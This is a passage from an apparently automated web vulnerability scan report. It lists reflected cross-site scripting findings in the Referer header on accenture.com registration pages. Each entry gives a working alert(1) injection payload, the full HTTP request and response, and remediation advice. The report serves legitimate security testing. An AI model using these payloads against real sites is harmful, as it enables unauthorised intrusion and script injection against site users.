Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: f93bb"%3balert(1)//7c5bd8ef11

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:53 GMT; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=%0aThanks+again+for+taking+the+time+to+submit+your+feedback+on+accenture.com%0a&ThankYouPageTitle=Feedback+Submitted&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/
Set-Cookie: FormSubmitURL=ThankYouPage.aspx; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 63558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title id="pageTitle">Submit feedback on accenture.com</title>
       <!-- Meta Data -->
       <meta http-equiv="Content
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/feedbackform.htm"
var formPageReferrer="accenture/registration/f93bb";alert(1)//7c5bd8ef11"
</script>
...[SNIP]...

1.1407. https://www.accenture.com/Accenture/Registration/LoginPage.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Accenture/Registration/LoginPage.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ee77"%3balert(1)//ac5d1db6925 was submitted in the Referer HTTP header. This input was echoed as 3ee77";alert(1)//ac5d1db6925 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Accenture/Registration/LoginPage.aspx HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: 3ee77"%3balert(1)//ac5d1db6925

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:46:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:36 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 57251


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Register or Sign In
       </title>
       <script language="javascript">
<!--
   function PopWindow(targeturl)
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/registration/loginpage.aspx"
var formPageReferrer="accenture/registration/3ee77";alert(1)//ac5d1db6925"
</script>
...[SNIP]...

1.1408. https://www.accenture.com/Accenture/Registration/SendPassword.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Accenture/Registration/SendPassword.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b8e6"%3balert(1)//52d4b73a73a was submitted in the Referer HTTP header. This input was echoed as 7b8e6";alert(1)//52d4b73a73a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Accenture/Registration/SendPassword.aspx HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: 7b8e6"%3balert(1)//52d4b73a73a

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:46:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:38 GMT; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=LoginPage.aspx&Content=Thank you. Your password will be sent to your e-mail address.&ThankYouPageTitle=Send Password Confirmation&ReferrerPageTitle=Login; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 52598


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Send Password</title>
       <script language="Javascript">
   function WindowParent(link){
       window.opener.docu
...[SNIP]...
cript language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/registration/sendpassword.aspx"
var formPageReferrer="accenture/registration/7b8e6";alert(1)//52d4b73a73a"
</script>
...[SNIP]...

1.1409. https://www.accenture.com/Accenture/Registration/SignOutPage.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Accenture/Registration/SignOutPage.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b801d"%3balert(1)//a7b9d784f20 was submitted in the Referer HTTP header. This input was echoed as b801d";alert(1)//a7b9d784f20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Accenture/Registration/SignOutPage.aspx HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: b801d"%3balert(1)//a7b9d784f20

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:46:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:34 GMT; path=/
Set-Cookie: SignOutPage=PrevUrl=https://www.accenture.com/Accenture/Registration/b801d";alert(1)//a7b9d784f20; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 51619


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Sign Out Confirmation</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/registration/signoutpage.aspx"
var formPageReferrer="accenture/registration/b801d";alert(1)//a7b9d784f20"
</script>
...[SNIP]...

1.1410. https://www.accenture.com/Global/Registration/Email_This.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Global/Registration/Email_This.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3399"%3balert(1)//c1a5427bf9a was submitted in the Referer HTTP header. This input was echoed as e3399";alert(1)//c1a5427bf9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/Registration/Email_This.htm HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: e3399"%3balert(1)//c1a5427bf9a

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:45:31 GMT
Content-Length: 27347
Connection: close
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:45:31 GMT; path=/
Set-Cookie: EmailColleagueLinkGuid=GUID=&IsSecured=; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/
Set-Cookie: FormSubmitURL=/Global/Registration/PopupThankYouPage; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title id="pageTitle">E-mail Article to a Colleague</title>
       <META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/email_this.htm"
var formPageReferrer="accenture/registration/e3399";alert(1)//c1a5427bf9a"
</script>
...[SNIP]...

1.1411. https://www.accenture.com/Global/Registration/FeedbackForm.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Global/Registration/FeedbackForm.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d2a"%3balert(1)//20d6ecca920 was submitted in the Referer HTTP header. This input was echoed as 15d2a";alert(1)//20d6ecca920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/Registration/FeedbackForm.htm HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: Commerce2002_TestSessionCookie=TestCookie; UrlTracker=ReferrerPageURL=/global/personalization&Content=%0aThanks+again+for+taking+the+time+to+submit+your+feedback+on+accenture.com%0a&ThankYouPageTitle=Feedback+Submitted&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; FormSubmitURL=ThankYouPage.aspx; Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US
Host: www.accenture.com
Referer: 15d2a"%3balert(1)//20d6ecca920

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 16:46:15 GMT
Connection: keep-alive
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:15 GMT; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=%0aThanks+again+for+taking+the+time+to+submit+your+feedback+on+accenture.com%0a&ThankYouPageTitle=Feedback+Submitted&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/
Set-Cookie: FormSubmitURL=ThankYouPage.aspx; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 63559


<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title id="pageTitle">Submit feedback on accenture.com</title>
       <!-- Meta Data -->
       <meta http-equiv="Content
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/feedbackform.htm"
var formPageReferrer="accenture/registration/15d2a";alert(1)//20d6ecca920"
</script>
...[SNIP]...

1.1412. https://www.accenture.com/Global/Registration/MailTo.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Global/Registration/MailTo.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da574"%3balert(1)//2f39dd2c397 was submitted in the Referer HTTP header. This input was echoed as da574";alert(1)//2f39dd2c397 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/Registration/MailTo.htm HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: Commerce2002_TestSessionCookie=TestCookie; Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US; UrlTracker=ThankYouPageTitle=Confirmation&Content=&ReferrerPageURL=/global/personalization&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY
Host: www.accenture.com
Referer: da574"%3balert(1)//2f39dd2c397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 16:46:16 GMT
Connection: keep-alive
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:16 GMT; path=/
Set-Cookie: UrlTracker=ThankYouPageTitle=Confirmation&Content=&ReferrerPageURL=/global/personalization&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/
Set-Cookie: FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 46442


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title id="pageTitle">Send us an E-mail</title>
       <META http-equiv="Content-Type" content="text/html; charset=win
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/mailto.htm"
var formPageReferrer="accenture/registration/da574";alert(1)//2f39dd2c397"
</script>
...[SNIP]...

1.1413. https://www.accenture.com/Global/Registration/Personalization [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Global/Registration/Personalization

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0b3c"%3balert(1)//dafb89c6dc9 was submitted in the Referer HTTP header. This input was echoed as d0b3c";alert(1)//dafb89c6dc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/Registration/Personalization HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: d0b3c"%3balert(1)//dafb89c6dc9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:45:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:45:38 GMT; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=%3cp%3eThank+you+for+registering+to+the+site+and+Personalization.+As+a+registered+user+there+are+a+variety+of+special+features+available+to+you%2c+such+as+a+personalized+information+on+%22Your+Content%22+page%2c+email+alerts+on+new+material+of+interest+and+newsletters+which+summarize+our+best+new+content.+Please+visit+%3ca+href%3d%22EAN.aspx%22%3eEmail+Alerts+and+Newsletters%3c%2fa%3e+for+more+information+on+these+topics+and+to+modify+your+profile.%3c%2fp%3e&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/
Set-Cookie: FormSubmitURL=ThankYouPage.aspx; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 110320


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title id="pageTitle">accenture.com Personalization Registration</title>
       <META http-equiv="Content-Type" conten
...[SNIP]...
script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/personalization.htm"
var formPageReferrer="accenture/registration/d0b3c";alert(1)//dafb89c6dc9"
</script>
...[SNIP]...

1.1414. https://www.accenture.com/Global/Registration/RequestServices.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /Global/Registration/RequestServices.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49479"%3balert(1)//08812ad7b8a was submitted in the Referer HTTP header. This input was echoed as 49479";alert(1)//08812ad7b8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/Registration/RequestServices.htm?link=%2fAccenture%2fRegistration%2fEAN.aspx HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: 49479"%3balert(1)//08812ad7b8a

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:46:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:04 GMT; path=/
Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/
Set-Cookie: FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 88917


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title id="pageTitle">Request for Services</title>
       <META http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/requestservices.htm"
var formPageReferrer="accenture/registration/49479";alert(1)//08812ad7b8a"
</script>
...[SNIP]...

1.1415. https://www.accenture.com/accenture/registration/PrintThis.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae01"%3balert(1)//ee29f38111e was submitted in the Referer HTTP header. This input was echoed as dae01";alert(1)//ee29f38111e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

